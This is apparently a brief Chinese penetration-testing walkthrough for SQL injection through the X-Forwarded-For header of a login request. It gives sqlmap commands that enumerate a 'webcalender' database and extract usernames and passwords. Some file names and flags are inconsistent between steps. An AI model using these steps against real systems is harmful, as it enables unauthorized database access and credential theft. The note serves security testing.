测试思路
1、登录后台提示ip信息不正确,这种情况一般是x-forwarded-for读取客户端ip
2、通过在数据包添加x-forwarded-for:1.1.1.1看 respone包中是否存在1.1.1.1
3、如果存在则证明用x-forwarded-for读取客户端数据,则存在注入漏洞
4、通过在登录框数据包中添加x-forwarded-for:*,用sqlmap 跑注入,跑数据库名,表名,字段名,字段内容
测试步骤
1、登陆随意输入密码,返回提示
2、在数据包添加x-forwarded-for:1.1.1.1看 respone包中是否存在1.1.1.1
3、存在此漏洞,保存请求包到1.txt里(X-Forwarded-For值改为*)
4、使用sqlmap开始跑,
1)sqlmap爆出库名:sqlmap -r d:/aaa.txt --db --batch
2)表名:sqlmap -r d:/aaa.txt -D webcalender --tables --batch
3)字段:sqlmap -r d:/aa.txt -D webcalender -T user --columns --batch
4)字段内容:sqlmap -r d:/aa.txt -D webcalender -T user -C 'user,password' --batch
获取账号与密码